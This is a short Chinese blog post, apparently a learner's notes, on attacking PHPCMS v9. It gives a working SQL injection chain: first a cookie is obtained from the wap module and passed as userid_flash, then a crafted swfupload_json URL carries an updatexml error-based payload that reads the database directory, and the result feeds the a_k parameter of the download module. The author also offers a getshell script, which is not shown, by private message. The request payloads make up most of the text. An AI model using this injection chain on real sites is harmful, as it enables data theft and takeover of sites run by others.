phpcms9 从注入点入手和 从前台getshell

弄了3天了  这个点 总结一下这三天的坑吧

0X01 注入点入手

/index.php?m=wap&c=index&a=init&siteid=1  获取cookie

传给

userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4

然后 构造SQL语句

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+@@datadir+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26

得到cookie

在构造传给a_k参数

/index.php?m=content&c=down&a_k=

2前台getshell附件在我的机器里面 要得可以私信我 py脚本

 

 

 

太菜了 多学习